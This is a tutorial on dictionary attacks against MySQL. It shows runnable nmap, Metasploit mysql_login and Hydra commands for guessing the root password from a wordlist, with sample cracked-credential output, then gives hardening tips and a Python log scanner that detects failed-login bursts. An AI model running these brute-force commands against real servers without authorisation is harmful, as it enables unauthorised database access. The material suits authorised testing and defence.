What is a Dictionary Attack?

A dictionary attack is a password-guessing technique in which a list of common passwords (a wordlist) is tried against an authentication service, one entry at a time, until a valid password is found. For MySQL, testing with a wordlist helps identify weak or default credentials that may compromise database security.


Step 1: Identify MySQL Service with Nmap

First, confirm that the MySQL service is running on the target system and enumerate its version.

nmap <IP Address> -p 3306 -sV

Explanation:

  • -p 3306 → Scans MySQL's default port

  • -sV → Identifies the service and version details

Example Output:

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 5.7.42

This confirms MySQL is reachable and running.


Step 2: Perform MySQL Dictionary Attack using Metasploit

Launch Metasploit Framework:

msfconsole

Load the MySQL login scanner module:

use auxiliary/scanner/mysql/mysql_login

Configure the options:

set rhosts <IP Address>
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set verbose false
set stop_on_success true
set username root
run

Parameter Breakdown:

  • rhosts → Target host IP

  • pass_file → Wordlist containing possible passwords

  • verbose → When false, failed attempts are not printed; only successful logins are shown

  • stop_on_success → Stops attack when a working credential is found

  • username → Username to brute-force

Expected Success Output:

[+] 3306 - Login Successful: root:password123

Step 3: Perform SQL Login Attack using Hydra

Hydra is a fast password-guessing tool that supports many protocols, including MySQL.

Command:

hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP Address> mysql

Explanation:

  • -l root → Username to attack

  • -P → Path to wordlist

  • mysql → Target service protocol

Example Output:

[3306][mysql] host: 192.168.1.10 login: root password: admin123

When to Use Which Tool?

Tool        Purpose                      Strength
Nmap        Identify service & version   Fast reconnaissance
Metasploit  More advanced exploitation   Can stop on success & gives detailed output
Hydra       Faster brute forcing         Supports many protocols

Prevention (Security Best Practices)

To protect MySQL servers against dictionary attacks:

  • Use strong, complex passwords

  • Disable remote root login

  • Limit MySQL access to trusted IPs only

  • Implement firewall rules

  • Monitor login attempts and enable logging
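
For the last item, monitoring login attempts, the following added example (not part of the original page) scans a MySQL error log for bursts of failed logins from one source, which is the pattern the Metasploit and Hydra runs above leave behind. It assumes the server records "Access denied" notes in the error log (log_error_verbosity=3 on MySQL 5.7) in the format shown in the comment; the log lines, source addresses and the find_bursts name are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed error-log format for failed logins (MySQL 5.7, log_error_verbosity=3):
# 2024-01-15T10:00:01.000000Z 21 [Note] Access denied for user 'root'@'192.168.1.50' (using password: YES)
DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})\.\d+Z\s+\d+\s+\[Note\].*?"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'"
)

def find_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Map (source host, user) -> peak failed logins inside one sliding window,
    for pairs that reach the threshold. Lines must be in chronological order."""
    recent = defaultdict(deque)   # failure timestamps still inside the window
    flagged = {}
    for line in lines:
        m = DENIED.match(line)
        if not m:
            continue              # not a failed-login entry
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S")
        key = (m["host"], m["user"])
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[key] = max(flagged.get(key, 0), len(q))
    return flagged

# Constructed sample log: six rapid failures for root from one host, one stray
# failure for another account, and an unrelated startup note.
SAMPLE_LOG = [
    f"2024-01-15T10:00:0{s}.000000Z {20 + s} [Note] Access denied for user "
    f"'root'@'192.168.1.50' (using password: YES)"
    for s in range(1, 7)
] + [
    "2024-01-15T10:00:09.000000Z 30 [Note] Access denied for user 'app'@'10.0.0.7' (using password: YES)",
    "2024-01-15T10:05:00.000000Z 0 [Note] InnoDB: Buffer pool(s) load completed",
]

if __name__ == "__main__":
    for (host, user), count in find_bursts(SAMPLE_LOG).items():
        print(f"ALERT {host} -> '{user}': {count} failed logins within 60s")
```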